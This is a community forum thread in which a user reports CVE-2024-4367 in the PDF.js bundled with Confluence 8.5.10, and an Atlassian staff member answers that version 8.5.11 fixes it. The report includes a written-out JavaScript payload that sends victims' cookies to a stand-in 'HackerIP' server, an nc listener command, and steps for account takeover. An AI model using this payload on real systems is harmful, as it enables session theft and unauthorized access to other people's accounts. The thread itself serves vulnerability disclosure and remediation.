[SEC] Confluence CVE-2024-4367 security issue

Yong Xin Choon October 8, 2024

 

We found CVE-2024-4367 in confluence version 8.5.10 and did not find an official way to deal with this vulnerability? How to make an effective fix?

Vulnerability Overview

In Confluence version 8.5.10, PDF.JS is referenced for loading and parsing PDF files. However, a previous vulnerability, CVE-2024-4367, exists in the PDF.JS plugin, affecting versions <= 4.1.392. It was discovered through testing that the version of PDF.JS used in Confluence 8.5.10 is also affected by this vulnerability.
An attacker can exploit this vulnerability by uploading a malicious PDF file. When the victim previews or opens this file, the malicious JavaScript code is automatically executed, leading to remote code execution (RCE) or theft of the victim's cookies. This could further allow the attacker to take control of the victim's system, steal sensitive information, bypass authentication mechanisms, and directly access the victim's account.
Reference links for CVE-2024-4367:
Since I could not find information about this vulnerability on your official website, https://www.atlassian.com/trust/data-protection/vulnerabilities, I attempted to disable the preview function in the background as an administrator but failed.
Following a solution from your official forum, modifying specific database table fields to disable the preview function is practically unfeasible.
I hope you can assist me in resolving this issue.

Vulnerability Steps

Using the tool https://github.com/LOURC0D3/CVE-2024-4367-PoC, I constructed a malicious PDF file that, when parsed by PDF.JS, automatically sends the victim's cookies to the attacker's server.

Attack Command

The following Python script is used to construct the malicious PDF file(I use this command to steal users' cookies):
Python: 

CVE-2024-4367.py "var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://HackerIP:2024/?cookie=' + document.cookie, true); xhr.withCredentials = true; xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log(xhr.responseText); } }; xhr.send();"

------

 

 

Steps to Exploit the Vulnerability

  1. Create a Page
Create a blank page in Confluence.
  1. Insert Malicious PDF Insert the generated malicious PDF file into the page.
  1. Victim Previews the File When the victim opens or previews the malicious PDF file, the malicious code is triggered.
  1. Attacker Listens on Port The attacker uses the following command to listen on the server port to capture the cookies:  nc -lvp 2024
  1. Capture Victim's Cookies The attacker receives the victim's cookies on the server.
  1. Use Cookies The attacker can use the stolen cookies to log into the victim's account without entering a username and password, leading to identity theft and sensitive data leakage. Since the page can be shared, any user can access the PDF, allowing us to steal cookies from any user.
  1. Remote Code Execution (RCE) By further exploiting this vulnerability, the attacker can achieve remote code execution, leading to more severe system damage.

Conclusion

This vulnerability can lead to serious consequences, including remote code execution, data theft, and identity theft.
How can this issue be addressed effectively?

1 answer

1 accepted

1 vote
Answer accepted
Saurabh Bhatia
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
October 8, 2024

Hi Yong,

Thank you for reaching out. We can confirm that this vulnerability has been fixed under Confluence 8.5.11 version. So, you can plan to upgrade Confluence and see if you are able to reproduce this behaviour by any chance.

In context of why this is not populating under our Vulnerability Portal, we have initiated a discussion internally to fix this part.  

Hope this information helps. 

Thanks

Yong Xin Choon October 8, 2024

Thanks Saurabh !

Suggest an answer

Log in or Sign up to answer
TAGS
AUG Leaders

Atlassian Community Events